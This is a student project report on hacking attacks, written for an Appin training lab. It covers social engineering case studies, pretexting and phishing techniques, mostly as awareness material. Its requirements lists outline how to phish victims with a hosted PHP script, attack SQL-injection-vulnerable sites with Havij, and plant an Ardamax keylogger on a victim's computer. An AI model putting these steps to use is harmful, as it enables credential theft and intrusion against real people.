Project Report on Hacking Attacks

Document Sample
Project Report on Hacking Attacks Powered By Docstoc
					                                            PREFACE

This project “HACKING ATTACKS” has been developed keeping in mind the heights
“Information Technology has reached” and when everything is powered with computers does
make a great difference. This project contains information about hacking attacks information
who are using internet connect when a person share his information on the internet then there
is more chances for the leakage of his personal information on the internet. In the Information
technology there is nothing safe and secure. Computer networks that are currently to the
internet are vulnerable to a variety of exploits that can compromise their intended operations.
The tremendous increase in online transactions has been accompanied by an equal rise in the
number and type of attacks against the security of online payment systems. Some of these
attacks have utilized vulnerabilities that have been published in reusable third party
components utilized by websites such as shopping cart software. So this project helps you how
to protect from the hacking attacks which are mainly done on the websites.

The project HACKING ATTACKS delivery status and notification system is being developed for
the need of company running Information Security services this is specially meant for their
frontline customer service information. This is one of the best efforts by us to prove that how
Internet was used to utilize it in a safe and secure way.




This report is written as a text for the partial fulfillment of the B.Tech (C.S.E.) program pursuing
From KURUKSHETRA UNIVERSITY, KURUKSHETRA.




                                                  1
                                ACKNOWLEDGEMENT
I would like to gratitude all those who have given me enthusiasm & moral support and helped
in developing my project (HACKING ATTACKS).




I wish to express my gratitude to projects Team at Head Office who guided and helped me. Also
I would like to express my gratitude to the staff members (Mr. Rajeshwar ) of Appin
Technology Lab for not only providing me opportunity to work with them on this project
(HACKING ATTACKS)but also for their guidance and enthusiasm throughout the my developing
process.




Finally my sincere gratitude expresses to e-projects Team at Appin Head Office and my project
guide at the organization, for his valuable guidance and support for the completion of mine
HACKING ATTACKS.




                                             2
                          CANDIDATES’S DECLARATION




I,Janender declare that the work which is being presented by me in this project entitled
“HACKING ATTACKS” in partial fulfillment of the requirement for the BACHELOUR OF
TECHNOLOGY (B.Tech) (COMPUTER SCIENCE AND TECHNOLOGY)               by “KURUKSHETRA
UNIVERSITY KURUKSHETRA”




    Is an authentic record of my own work carried out from July to September 2011 under the

supervision of Mr Rajeshwar, Team Leader of APPIN TECHNOLOGY LAB




                                                                              Janender Kumar
                                                                  B.Tech (C.S.E.) 7TH Semester
                                                                            K.U.K. (HARYANA)




                                            3
                                   COMPANY PROFILE




HISTORY - APPIN SECURITY GROUP
Appin Security Group is a global Information Security company focused on training, consulting
and solutions. The company was formed as a merger of two entities, XIRS Ventures Inc based in
Austin Texas incorporated in 2003 and XIRS Appin incubated inside IIT, Delhi India formed in
2004.

Later the name XIRS was dropped from the company and the merged entity is known as Appin
Technologies. From USA & India, the company has now expanded its operations to Europe,
Africa and South East Asia as well.

The company has gone through several mergers and acquisitions and has operated businesses
under the trademarks 'Appin Knowledge Solutions', 'XIRS Appin', 'Appin Technologies', 'Appin
Overseas', 'Appin Software Security' all of whom form a part of the current Appin Security
Group.

INFORMATION SECURITY SERVICE, ETHICAL HACKING TRAINING & CYBER
INVESTIGATION SOLUTIONS
Every day when Appin-ites wake up, we strive to come up with new ways to make our clients
feel more secured. Its our mission to secure what is important to you, and to better it with
time.

We offer Information Security, Ethical Hacking & Allied Technology training to students and
help them build a career by taking our courses ranging from 6 weeks to 3 years. Having trained
and mentored over 83000 students in classroom and distance learning training sessions; we are
confident of doing justice with a students career. We also provide exclusive business
opportunities to Individuals and Small Business to start a franchise in their area focused on IT &
Security training and solutions.

                                                4
Over 110 entrepreneurs have joined hands with us in 18 nations and 70 cities. Its true that we
are still very short of the 33000 mark achieved by Subway but hope to get there soon. We offer
investigative solutions to investigative and intelligence bodies with specialization in cyber
investigation work. 530 organizations including countries governments and top-notch lawyers
trust us with their investigation related work.

Last but not the least, Appin holds unique distinction of providing Information security
consulting & network security services to India's all 4 major airports Delhi, Mumbai, Bangalore,
Hyderabad and also is a security solutions provider to over 1300 Websites that are audited and
monitored by Appin globally.

We have served Microsoft, Intuit, Actis & Daikin; we promise to help you with your security
needs with equal zeal and enthusiasm if you are 20 people company that selects us as their
security partner. We will feel extremely privileged for same.

ETHICAL HACKING, INFORMATION SECURITY & IT TRAINING COURSE
Appin Technology Labs, currently a network of 110+ training labs provides comprehensive
training in Information Security, Ethical Hacking and related technology areas including
Embedded Robotics, Programming (Microsoft .NET, Java, PHP), Networks, Database and has
been operating training centers across India, Africa, Asia, Eastern Europe, South America and
Middle East. Appin also runs online training programs in North America, Western Europe and
Australia. We are among top 5 IT professional training companies and the best in its category by
the popular The Week magazine. As a next step, we recommend you to either fill the inquiry
form and have a call back from our counselor and receive directions to the nearest center, or
read more about our courses and select the one that best fits your need.

WHY INFORMATION SECURITY IS THE RIGHT CAREER CHOICE?
“Frost & Sullivan estimated that there are 2.28 million information security professionals
worldwide. This figure is expected to increase to nearly 4.2 million by 2015. Budgets and
spending are expected to increase in the next 12 months, and salaries showed healthy growth
despite a global recession.” Current worldwide growth rate is billed at 21%. Higher salaries are
been offered to professionals in IT security. Information security industry is currently over $100
B ($60 B in US, $ 20B UK, $4.5 B Japan, over $1.5 B India).Read More

FRONTRUNNER - 6 MONTH JOB ORIENTED DIPLOMA PROGRAM
Appin Frontrunner program is designed for individuals whose goal is to build a career in the
field of Ethical Hacking & Information Security. This practical training program starts with basics
of desktop security and covers SQL injection attacks, encryption, forensics and a total of 110


                                                5
topics . Over 63.4% of students who did this course over half a decade have been placed within
3 months of doing this course. Read More



APPIN IN MEDIA

Appin      awarded       PC     Quest     best     security   implementation            award
http://pcquest.ciol.com/content/contentimplementation2008/2008/108050704.asp

Appin’s book on embedded security/ robotics becomes bestseller at amazon.com in both US
and                                                                                  UK
http://www.amazon.com/Robotics-Appin-Knowledge-Solutions/dp/1934015024
http://www.amazon.co.uk/Robotics-Appin-Knowledge-Solutions-ebook/dp/B004HO57LW
http://amazonthebestsellersbooks.blogspot.com/2011/03/robotics-appin-knowledge-
solutions.html

Appin’s      software       awarded         bestseller       on        PC                world
http://www.pcworld.com/downloads/userreviews/fid,45453/userreviews.html

Appin’s credibility on Ebay as an Information Security course-ware seller since Jan 2001 (Later
Appin      launched      franchise     model     and      stopped      selling     courseware)
http://feedback.ebay.com.au/ws/eBayISAPI.dll?ViewFeedback2&userid=appinlabs&ftab=Feedb
ackAsSeller

Appin’s collaboration with Microsoft for Software security on Businesswire News site
http://www.businesswireindia.com/PressRelease.asp?b2mid=10155

Appin launch of encryption tool as reported by World Free                                Press
http://www.free-press-release.com/news-appin-encryption-tool-for-data-security-
1252406123.html

Appin launch operations in Chennai as reported by The Hindu, a leading Indian newspaper
http://www.hindu.com/2006/03/11/stories/2006031117350500.htm

Appin tieup with Gurukul for launching first online security and hacking course in india
http://www.golsacademy.com/courses-esecurity.jsp?id=2

Appin parterns with ICBT and enters Sri Lanka as reported by Sri Lankan website IT pro.

                                              6
http://www.itpro.lk/node/169

Appin partners with Telcordia (US Billion dollar conglomerate and chief force behind number
portability)    to       offer      security       services     to      telecom       sector.
http://www.telcordia.com/news_events/pressreleases/2008/05312008.html

Appin      secures     commonwealth       games     2010     held     at      New       Delhi
http://blog.appinonline.com/appin-case-study/appin-completes-another-critical-project-for-
information-security-%E2%80%93-our-own-commonwealth-games-delhi-2010.htm

Manipal and Appin join hands to launch India’s first security distance learning program as
reported            by           The             Hindu              and            Tribune
http://www.hindu.com/edu/2006/10/16/stories/2006101600280100.htm
http://www.tribuneindia.com/2006/20060915/delhi.htm

Appin partners with Intertek, UK a $1.2B group to launch IT software certification
http://news.oneindia.in/2008/03/27/appin-intertek-launch-it-certification-1206622960.html

Accolades       for        Appin        in        leading       Franchising       websites
http://www.franchiseindia.com/interviews/Established/Hi-tech-knowledge-solutions-gaining-
ground-162/
http://www.franchisebusiness.in/c/Appin-Knowlegde-Solutions

Appin in India’s leading dailies Hindustan Times and Times of India
http://www.hindustantimes.com/Safety-net/Article1-617940.aspx
http://www.hindustantimes.com/StoryPage/Print/313041.aspx
http://www.hindustantimes.com/India-caught-in-the-hackers-net/Article1-310109.aspx
http://epaper.timesofindia.com/Repository/getFiles.asp?:LowLevelEntityToPrint_TOINEW&/ht
ml&Locale=english-skin-custom&Path=CAP/2010/08/23&ID=Ar04401
http://epaper.timesofindia.com/Repository/getFiles.asp?:LowLevelEntityToPrint_TOINEW&/ht
ml&Locale=english-skin-custom&Path=TOIM/2010/08/09&ID=Ar03303
http://articles.timesofindia.indiatimes.com/2004-11-15/education/27149193_1_ipr-iit-d-
seminar
http://articles.timesofindia.indiatimes.com/2008-05-
26/education/27746033_1_nanotechnology-students-industry-interaction
http://articles.timesofindia.indiatimes.com/2008-05-05/job-trends/27742689_1_information-
security-cyber-crimes-security-consultants



                                             7
http://articles.timesofindia.indiatimes.com/2008-07-20/india-business/27921804_1_mobile-
phones-smart-phone-mobile-connections/2




THE INFORMATION SECURITY SPECIALISTS
Appin Security Solutions offers comprehensive solutions to meet real time security needs.
Appin offers a broad array of distributed products and services built on vulnerability-based
research and multi-layered security techniques. Appin has the extensive knowledge, innovative
research methods and complex technologies required to achieve comprehensive security. Our
experienced and certified consultants, architects, project managers and subject matter experts
are prepared to provide your organization with a comprehensive platform of security products
and services designed to protect your entire IT infrastructure, from the network gateway to the
desktop.

The six concepts that need to be covered by security are: confidentiality, integrity,
authentication, authorization, availability, and non-repudiation.

Confidentiality: A security measure which protects against the disclosure of information to
parties other than the intended recipient(s). Often ensured by means of encoding, using a
defined algorithm and some secret information known only to the originator of the information
and the intended recipient(s) (a process known as cryptography) but that is by no means the
only way of ensuring confidentiality.

Integrity: A measure intended to allow the receiver to determine that the information which it
receives has not been altered in transit or by other than the originator of the information.
Integrity schemes often use some of the same underlying technologies as confidentiality
schemes, but they usually involve adding additional information to a communication to form
the basis of an algorithmic check rather than encoding all of the communication.

Authentication: A measure designed to establish the validity of a transmission, message, or
originator. It allows a receiver to have confidence that the information it receives originated
from a specific known source.

Authorization: The process of determining that a requester is allowed to receive a service or
perform an operation.
Availability: Assuring information and communications services will be ready for use when


                                                 8
expected. Information must be kept available to authorized persons when they need it.
Non-repudiation: A measure intended to prevent the later denial that an action happened, or a
communication took place, etc. In communication terms, this often involves the interchange of
authentication information combined with some form of provable time stamp.




                                              9
Introduction to Project


Project Objective

Hacking Attacks Project’s main motto is providing awareness from different hacking attacks. It
provides different method to protect our pc and data from different hacking attacks.

Introduction

Computer networks that are currently to the internet are vulnerable to a variety of exploits that
can compromise their intended operations. Systems can be subject to denial of Service attacks
that prevents other computer from connecting to them for their provided service (e.g. web
server) or prevent them from connecting to other computer on the Internet. They can be
subject to attacks that cause them to cease. Operations either temporary or permanently. A
hacker may be able to compromise a system administrator. The number of exploits targeted
against various platforms, operating systems, and applications increases on daily basis. System
administrators are usually responsible for monitoring the overall security of their networks.

The tremendous increase in online transactions has been accompanied by an equal rise in the
number and type of attacks against the security of online payment systems. Some of these
attacks have utilized vulnerabilities that have been published in reusable third party
components utilized by websites such as shopping cart software. Other attacks have used
vulnerabilities that are common in any web application, such as SQL injection or cross-site
scripting. This article discusses these vulnerabilities with examples, either from the set of
known vulnerabilities or those discovered during the author’s penetration testing assignment.
The different types of vulnerabilities discussed here are SQL injection, cross-site scripting,
information disclosure, path disclosure, price manipulation and buffer overflows. Successful
exploitation of these vulnerabilities can lead to a wide range of results .Information and path
disclosure vulnerabilities will typically act as initial stages leading to further exploitation. SQL
injection or price causes the e- commerce business to shut down completely.

Types of Attacks

   1. Non Technical Attacks
          I. Social Engineering Attack
         II. Pretexting
   2. Technical Attacks

             I. Phishing Attack
            II. SQL Injection
           III. Keyloggers
                                                 10
                                       HACKING ATTACKS




                Non Technical Attack               Technical Attack

                   1. Social Engineering
                   2. Pretexting                      1. SQL Injection
                                                      2. Phishing
                                                      3. Key logger




SQL Injection




                                             11
Phishing




Key loggers




              12
Functional Requirement

   1.  All hacking attacks are provided with the prevention methods.
   2.  These hacking attacks can be performed with in certain conditions.
   3.  All hacking attacks have certain requirements for performing.
   4.  There may be certain restriction on performing these hacking attacks in any case there
       may be some mishappning can also occur.
   5. These hacking can cause some problem to your system.
   6. In Phishing Attack we need a php script and a account on any free hosting site for
       performing phishing we have to send a link to the victim.
   7. In SQL Injection Attacks we have find the SQL Injection vulnerable site for performing
       these attacks.
   8. In SQL Injection Attacks there might be some website are restricted so be careful for
       perfoming these attacks.
   9. In Key logger Attacks Key Logger Is created by using ardamax key Logger for making Key
       logger are this key logger has to be installed in victim computer.
   10. All these attacks are have prevention methods.




System Requirement

   1.   Operating system : Windows XP
   2.   Phishing tool: PHP script and web server
   3.   SQL Injection Tool: SQL Poizon and Havij or Net Connection.
   4.   Key logger :Ardamax Key Logger




                                              13
   11.

Non Technical Attacks

1. Social Engineering Attack

Most of us are suckered at some point in our lives: coaxed, threatened, heart-strung or baited
into doing something against our better judgment. After it happens, we often feel foolish,
although in truth, falling for a con is seldom a question of intelligence. As humans, we are
bound by both nature and nature to the social contract which like many contracts might be
twisted to our disadvantages. Such twisting is called “social engineering”.

Social engineering is the name given to a category of security attacks in which some one
manipulates others into revealing information that can be used to steal, data access to systems
access to cellular phones, money or even your own identity. Such attacks can be very simple or
very complex. Gaining access to information over the phone or through web sites that you visit
has added a new dimension to the role of the social engineer.

In a business context, a thief (“social engineer”) finds a target and uses the target’s compulsion
to be liked, to avoid confrontations, or to prevent embarrassment against them. Usually the
target is a gatekeeper: someone who has or can provide privileged access to physical or
information assets. Although social engineering exploits can be complex and clever, they’re
usually simple ad short-lived.you will be asked to break a rule. There will be extenuating
circumstances. You won’t be given much time to think, and the emotional pressure typically
anger, camaraderie or desperation escalates quickly. Perhaps there will be tears. The key to be
rebuffing this sort of exploit lies less in recognizing it when it happen then in hardening yourself
to it ahead of time. Being aware of your environment is your first defense. Knowing what
information you may share when to say no is another? The most critical defense, however,
understand that its ok to break the social contract in the interest of security and knowing how
do it without incurring undue stress or guilt. Company policies and procedures can be great
assets in thwarting social engineering exploits. As a concrete references for security practices,
they should reduce the need for uncomfortable judgment calls. In the event that your security
judgment is challenged, policies can also represent a solid “falls break” defense. Finally, policies
provide contact information for reporting security incident after they occur reporting exploit
attempts is not only good practice; it is a way to get healthy validation for your difficult choice.

Methodology

A five steps approach was used to characterize useful information, extraction attacks and
counter measures.



                                                 14
      Data was obtained from the chosen social network of several users. The data was taken
       from well-known people on the network, as well as less famous. Further more, users
       who were very active such as less active users were observed.
      The data gathered in first step was studied and it was determined which kind of attack
       could be realistic
      Three sample attacks were chosen which took place, in the last year. all of this attack.
       the chosen attacks were then transferred to the prototypes and the chosen social
       network.
      The attack were tested on the sample profiles for there feasibility and efficiency.
      Countermeasures were elaborated to mitigate the risk of attacks.


Example of Social Engineering

Social engineering expert Chris Hadnagy shares juicy tales of successful cons he's seen as a
security consultant, and six prevention tips

By Joan Goodchild, Senior Editor




Chris Hadnagy gets paid to fool people, and he's gotten pretty good at it over the years. A co-
founder of social-engineering.org and author of Social Engineering: The Art of Human Hacking,
Hadnagy has been using manipulation tactics for more than a decade to show clients how
criminals get inside information.

Hadnagy outlines three memorable stories of social engineering tests that he's included in his
new book (you can also read a short excerpt), and points out what organizations can learn from
these results.

The Overconfident CEO

In one case study, Hadnagy outlines how he was hired as an SE auditor to gain access to the
servers of a printing company which had some proprietary processes and vendors that
competitors were after. In a phone meeting with Hadnagy's business partner, the CEO informed
him that "hacking him would be next to impossible" because he "guarded his secrets with his
life."

"He was the guy who was never going to fall for this," said Hadnagy. "He was thinking someone
would probably call and ask for his password and he was ready for an approach like that."



                                               15
After some information gathering, Hadnagy found the locations of servers, IP addresses, email
addresses, phone numbers, physical addresses, mail servers, employee names and titles, and
much more. But the real prize of knowledge came when Hadnagy managed to learn the CEO
had a family member that had battled cancer, and lived. As a result, he was interested and
involved in cancer fundraising and research. Through Facebook, he was also able to get other
personal details about the CEO, such as his favorite restaurant and sports team.

Armed with the information, he was ready to strike. He called the CEO and posed as a
fundraiser from a cancer charity the CEO had dealt with in the past. He informed him they were
offering a prize drawing in exchange for donations—and the prizes included tickets to a game
played by his favorite sports team, as well as gift certificates to several restaurants, including
his favorite spot.

The CEO bit, and agreed to let Hadnagy send him a PDF with more information on the fund
drive. He even managed to get the CEO to tell him which version of Adobe reader he was
running because, he told the CEO "I want to make sure I'm sending you a PDF you can read."
Soon after he sent the PDF, the CEO opened it, installing a shell that allowed Hadnagy to access
his machine.

When Hadnagy and his partner reported back to the company about their success with
breaching the CEO's computer, the CEO was understandably angry, said Hadnagy.

"He felt it was unfair we used something like that, but this is how the world works," said
Hadnagy. "A malicious hacker would not think twice about using that information against him."

Takeaway 1: No information, regardless of its personal or emotional nature, is off limits for a
social engineer seeking to do harm

Takeaway 2: It is often the person who thinks he is most secure who poses the biggest
vulnerability. One security consultant recently told CSO that executives are the easiest social
engineering targets.



The theme-park scandal

The target in this next case study was a theme park client that was concerned about potential
compromise of its ticketing system. The computers used to check-in patrons also contained
links to servers, client information and financial records. The client was concerned that if a
check-in computer was compromised, a serious data breach might occur.

Hadnagy started his test by calling the park, posing as a software salesperson. He was offering a
new type of PDF-reading software, which he wanted the park to try through a trial offer. He



                                                16
asked what version they were currently using, got the information easily, and was ready for
step two.

The next phase required on-site social engineering, and Hadnagy used his family in order to
ensure success. Heading up to one of the ticket windows with his wife and child in tow, he
asked one of the employees if they might use their computer to open a file from his email. The
email contained a pdf attachment for a coupon that would give them discount admission.

"The whole thing could have gone south if she said 'No, sorry, can't do that,'" explained
Hadnagy. "But looking like a dad, with a kid anxious to get into the park, pulls at the heart
strings."

The employee agreed, and the park's computer system was quickly compromised by Hadnagy's
bad PDF. Within minutes, Hadnagy's partner was texting him to let him know he was 'in' and
'gathering information for their report.'

Hadnagy also points out that while the park's employee policy states that they should not open
attachments from unknown sources (even a customer needing help), there were no rules in
place to actual enforce it.

"People are willing to go to great lengths to help others out," said Hadnagy.

Takeaway 3: Security policy is only as good as it is enforcement

Takeaway 4: Criminals will often play to an employee's good nature and desire to be helpful



The hacker is hacked

Hadnagy gives a third example showing how social engineering was used for defensive
purposes. He profiles 'John,' a penetration tester hired to conduct a standard network pen test
for a client. He ran scan using Metasploit, which revealed an open VNC (virtual network
computing) server, a server that allows control of other machines on the network.

He was documenting the find with the VNC session open when, suddenly, in the background, a
mouse began to move across the screen. John new it was a red flag because at the time of day
this was happening, no user would be connected to the network for a legitimate reason. He
suspected an intruder was on the network.

Taking a chance, John opened Notepad and began chatting with the intruder, posing as a 'n00b'
hacker, someone who is new and unskilled.




                                                17
"He thought 'How can I get more information from this guy and be more valuable to my
client?'" said Hadnagy. "John played to the guy's ego by trying to pretend he was a newbie who
wanted to learn more from a master hacker."

John asked the hacker several questions, pretending to be a younger person who wanted to
learn some tricks of the hacking trade and who wanted to keep in touch with another hacker.
By the time the chat was over, he had the intruder's email, contact information—and even a
picture of him. He reported the information back to his client, and the problem of easy access
to the system was also fixed.

Hadnagy also points out that John learned through his conversation with the hacker that the
hacker had not really been 'targeting' the company who he had hacked, he had just been out
looking around for something easy to compromise and found that open system quite easily.



Common type of social engineering

Social engineering can broken into

    Human Based: human based refers to person to person interaction to retrieve the
     desired information.

                Impersonation- Case studies indicate that help desks are the most frequent targets
                 of social engineering attacks.
                      A social engineer calls help desks.
                      Help desks is helpful.
                      Social engineering will often know names of employees.
                Important User – A common ploy is to pretended be not only an employ, but a wise
                 president.
                          Help desks is less likely to turned down a request coming from high level
                              official.
                          Social engineer may threaten to report the employ to there supervisor
                Third party authorization- The social engineer may have obtain the name of
                 someone in organization who has the authority to grant access to information.
                           Ms. Martinez say it’s ok.
                           Before he went on vacation,Ms. Martinez said I should call you to get this
                              information
                Tech Support – Social Engineer pretend to be someone from the infrastructure
                 support groups.
                            System is having a problem
                            Need them to log on to test the connection



                                                 18
                
                In Person –Social engineer may enter the building and pretend to be an employ,guest
                or service personal.
                     May be dressed in uniform
                     Allowed to room
                     Become part of cleaning crew
             Dumpster diving- Going to through the trash
             Shoulder Surfing- Looking over a shoulder to see what they are typing.
                     Password
                     Phone-Card No
    Computer Based: Computer based refer to having a computer software that attempt to retrieve
     the desired information.
          Pop Up Windows: A window will appear on the screen telling the user he has lost his
             network connection and need to renter there username and password
                  A program will then email the intruder with the information.

               Mail Attachments- Programs can be hidden in mail attachments.
                    Virus
                    Worms
                    I Love You
               Spam, Chain letters and hoaxes- These all rely on social engineering to be spread.
                    While they do not usually cause damage, they do cause a loss of productivity.
                    They use valuable network resources.
               Website- A common ploy is to offer something free or a chance to win a sweepstakes on
                website.
                    To win require an e-mail address and password.
                    Used with 401k come on.

“The best defense against social engineering attacks combine raising the bar of awareness among
student, faculty and staff, coupled with sense of personal responsibility to protect the assets. ”

2. Pretexting

Pretexting is generally defined as obtaining sensitive or personal information through
impersonation or other deception. Pretexting is considered an illegal act under most
circumstances, but the laws against the practice vary from state to state and aren't always
clearly written. It is illegal, under the Gramm-Leach-Bliley Act, to use pretexting in order to gain
access to bank accounts or other sensitive financial information. It is not necessarily illegal,
however, to use pretexting in order to obtain phone records or expose an unfaithful spouse.
Lying about your identity is not always a crime, but benefiting financially from pretexting is
actionable.

Many people are familiar with the idea of illegal computer hacking and identity theft, but very
few people are familiar with the practice of pretexting. Hacking into computer servers or using
                                                  19
sophisticated programs to uncover passwords is only one aspect of cyberhacking. Practices such
as pretexting and phishing are examples of social engineering, the human element behind
hacking. Pretexting works best when the pretexter gives a convincing performance, complete
with the proper technical jargon or other insider information.

A typical pretexting incident might involve a criminal trying to access a victim's personal bank
account. The criminal calls the victim at home, claiming to be conducting a survey. The
questions may sound relatively harmless, but the fake surveyor is really trying to glean personal
information, such as a mother's maiden name, a birthdate, a family pet's name or even a
portion of the victim's Social Security number. Once the perpetrator has this information, the
pretexting continues at the victim's bank.

The caller uses the victim's name when identifying himself to the bank's representative. A
pretexter might create a story about losing a checkbook or forgetting her new password. The
bank may have strict security measures in place, but the criminal's pretexting can provide many
of the answers they seek. Once the criminal has full access to the victim's banking information,
he can clear out the account in minutes. Another pretexting criminal may use personal
information to create a new credit card account or take over an existing one.

In 2006, the chief executive officer (CEO) of the computer giant Hewlett-Packard became
embroiled in a pretexting scheme and eventually resigned. In an effort to discover the source of
internal information leaks, the former CEO hired an outside investigator. Several Hewlett-
Packard executives discovered that their personal and professional phone records had been
collected without their permission. Following an investigation, it was determined that the
outside investigators had used pretexting in order to obtain those phone records. The phone
company's representatives believed they were communicating with the real Hewlett-Packard
employees.

Because of pretexting incidents such as these, lawmakers are working towards a more inclusive
set of laws that would make all forms of commercial pretexting illegal. Private uses of
pretexting may still occur, but the victims could have some legal recourse if the information is
used for illegal gain.

The targets of social engineers who use pretexting aren't just individuals like you or me. They
can extend to even large corporations.

Pretexting in Action

There are tons of movies out there where a hero or a villain uses disguises to infiltrate their
enemies. They're caught in the end eventually and you go on to watch the rest of the story
progress. In real life, however, not all infiltrators are caught, and they are most definitely never
ad hoc. There's meticulous planning involved and with the help of the Internet, it's only become
easier.


                                                20
Creating a fake scenario is much simpler now than ever before. The Internet has so many
sources of information that it's hard to determine what's real and what's a scam. Social
engineers know this and use it to their advantage. They can set up fake websites, advertise on
real websites with fake announcements, and use e-mail to fool people into believing their
stories.

Most recently, in Boston, a social engineer used pretexting tactics by creating a fraudulent web
site advertising a bridal expo. The web site invited not only attendees but vendors as well. They
advertised by e-mail, posting on Twitter, advertised through Facebook, all actions a true expo
would perform. They even went so far as to create a fake phone number for people to call and
set up their payments through PayPal. Attendees paid $10 to $15 dollars for tickets, and
vendors ranged from $30 to $4000! An estimated 6000 individuals and vendors were reported
to have been tricked. This is only one case out of hundreds, and even almost a year later, the
culprits have yet to be found.

Pretexting and You

Corporations use security consulting companies to measure their security against social
engineering. There are third party firms out there that are paid to use pretexting tactics to
enter a large corporate and steal whatever information they can. The third party firm randomly
picks a time before they call and e-mail ahead of time and use pretexting to trick the front desk
employees there is a maintenance team headed their way. They create a fake website and buy
fake uniforms to continue their facade.

Working in the consulting sector, I have heard stories of CEO's leaving their offices open, the
security teams left alone in the building after hours, and confidential paperwork lying in the
open. Servers, full of confidential information, were available for access by thumb drives . At
the end of the day the security team brings back all the information and reports on the status of
the corporation's security against social engineering, and pretexting in general. What the
company does afterwards is up to them; there's no guarantee that they'll fix their mistakes.

There's not a lot that can be done regarding your information hosted on corporate servers that
are susceptible to social engineers. The liability is on the corporation. That doesn't mean that
an individual will not be targeted in a similar fashion.

In the same way that a social engineer can create a false pretense that they're a maintenance
worker for a corporation, they can create a persona to enter into an individual's home or office.
If you live in an apartment, an e-mail can be spoofed notifying you that a worker will visit to
check for some wiring issues. You might stumble on a website, created under false pretense by
a social engineer, advertising low priced computer repair, and they're available where you live.




                                               21
Protecting Yourself from Pretexting

With this knowledge of what pretexting is and how it's used, it's time to discuss how to protect
yourself. How do you protect yourself from social engineers who create elaborate scenarios,
plan each detail, and are driven to steal? What protective measures must you take to keep your
information and your valuables?

Like any other defense to social engineering, you must be proactive and not reactive.

If you receive an e-mail from someone saying that a maintenance worker will be swinging by,
contact the sender's company, not the sender. Give them a ring and verify that they are sending
someone. If you're home when they arrive, ask to speak to their supervisor, but don't take their
word for it, ask for the company's corporate number and their supervisor's name, so that you
can call from your own personal phone. It may seem rude, but if they are a social engineer, your
best defense is to punch holes into their fantasy world.

The same applies to websites advertising events and expos. Call the event center and ask about
the event; go straight to the source. It should raise red flags in your head when you notice that
only cash and PayPal are accepted.

In any event, your best measure of protection is to hit the source of the pretense. If the social
engineer is using pretexting, their weakest point is the fact that their source doesn't exist, it's all
fabricated.




                                                  22
Technical Attacks

1. Phishing

History and current status of phishing

 A phishing technique was described in detail in 1987, in a paper and presentation delivered to
the International HP Users Group. The first recorded mention of the term "phishing" is on the
alt.online-service.america-online Usenet newsgroup on January 2, 1996.

     Phishing is online identity theft in which confidential information is obtained from an
individual. It is distinguished from offline identity theft such as card skimming and “dumpster
diving,” as well as from large-scale data compromises in which information about many
individuals is obtained at once. Phishing includes many different types of attacks, including:

     Deceptive attacks, in which users are tricked by fraudulent messages into
     Giving out information.

     Malware attacks, in which malicious software causes data compromises.
     DNS-based attacks, in which the lookup of host names is altered to send
      Users to a fraudulent server.

Phishing targets many kinds of confidential information, including user names

And passwords, social security numbers, credit card numbers, bank account Numbers

And personal information such as birthdates and mothers’ maiden Names.

What Is Phishing?

        The term phishing is a general term for the creation and use by criminals of e-mails and
websites – designed to look like they come from well-known, legitimate and trusted businesses,
financial institutions and government agencies – in an attempt to gather personal, financial and
sensitive information. These criminals deceive Internet users into disclosing their bank and
financial information or other personal data such as usernames and passwords, or into
unwittingly downloading malicious computer code onto their computers that can allow the
criminals subsequent access to those computers or the users’ financial accounts.
                        Phishing is committed so that the criminal may obtain sensitive and
valuable information about a consumer, usually with the goal of fraudulently obtaining access
to the consumer’s bank or other financial accounts. Often “phishes” will sell credit card or
account numbers to other criminals, turning a very high profit for a relatively small
technological investment




                                               23
Recent phishing attempts

Phishers are targeting the customers of banks and online payment services. E-mails, supposedly
from the Internal Revenue Service, have been used to glean sensitive data from U.S. taxpayers.
While the first such examples were sent indiscriminately in the expectation that some would be
received by customers of a given bank or service, recent research has shown that phishers may
in principle be able to determine which banks potential victims use, and target bogus e-mails
accordingly. Targeted versions of phishing have been termed spear phishing. Several recent
phishing attacks have been directed specifically at senior executives and other high profile
targets within businesses, and the term whaling has been coined for these kinds of attacks.

      Social networking sites are now a prime target of phishing, since the personal details in
such sites can be used in theft; in late 2006 a computer worm took over pages on My Space and
altered links to direct surfers to websites designed to steal login details. Experiments show a
success rate of over 70% for phishing attacks on social networks.

  The Rapid Share file sharing site has been targeted by phishing to obtain a premium account,
which removes speed caps on downloads, auto-removal of uploads, waits on downloads, and
cool down times between downloads.

        Attackers who broke into TD Ameritrade's database (containing all 6.3 million
customers' social security numbers, account numbers and email addresses as well as their
names, addresses, dates of birth, phone numbers and trading activity) also wanted the account
usernames and passwords, so they launched a follow-up spear phishing attack.

                 Almost half of phishing thefts in 2006 were committed by groups operating
through the Russian Business Network based in St. Petersburg. Some people are being
victimized by a Face book Scam, the link being hosted by T35 Web Hosting and people are
losing their accounts. There are anti-phishing websites which publish exact messages that have
been recently circulating the internet, such as Fraud Watch International and Miller smiles.
Such sites often provide specific details about the particular messages.

Link manipulation

        Most methods of phishing use some form of technical deception designed to make a link
in an e-mail (and the spoofed website it leads to) appear to belong to the spoofed organization.
Misspelled URLs or the use of sub domains are common tricks used by phishers.

           In the following example URL, http://www.yourbank.example.com/, it appears as
though the URL will take you to the example section of the your bank website; actually this URL
points to the "your bank" (i.e. phishing) section of the example website. Another common trick

                                              24
is to make the displayed text for a link (the text between the <A> tags) suggest a reliable
destination, when the link actually goes to the phishers' site. The following example link,
http://en.wikipedia.org/wiki/Deception, appears to take you to an article entitled "Genuine";
clicking on it will in fact take you to the article entitled "Deception". In the lower left hand
corner of most browsers you can preview and verify where the link is going to take you.

        An old method of spoofing used links containing the '@' symbol, originally intended as a
way to include a username and password (contrary to the standard).For example, the link
http://www.google.com@members.tripod.com/ might deceive a casual observer into believing
that it will open a page on www.google.com, whereas it actually directs the browser to a page
on members.tripod.com, using a username of www.google.com: the page opens normally,
regardless of the username supplied. Such URLs were disabled in Explorer, while Mozilla
Firebox and Opera present a warning message and give the option of continuing to the site or
canceling.

        A further problem with URLs has been found in the handling of internationalized domain
names (IDN) in web browsers that might allow visually identical web addresses to lead to
different, possibly malicious, websites. Despite the publicity surrounding the flaw, known as
IDN spoofing or homograph attack, phishers have taken advantage of a similar risk, using open
URL redirectors on the websites of trusted organizations to disguise malicious URLs with a
trusted domain. Even digital certificates do not solve this problem because it is quite possible
for a phisher to purchase a valid certificate and subsequently change content to spoof a
genuine website.

Filter evasion

       Phishers have used images instead of text to make it harder for anti-phishing filters to
detect text commonly used in phishing e-mails.

Website forgery

       Once a victim visits the phishing website the deception is not over. Some phishing scams
use JavaScript commands in order to alter the address bar.This is done either by placing a
picture of a legitimate URL over the address bar, or by closing the original address bar and
opening a new one with the legitimate URL.

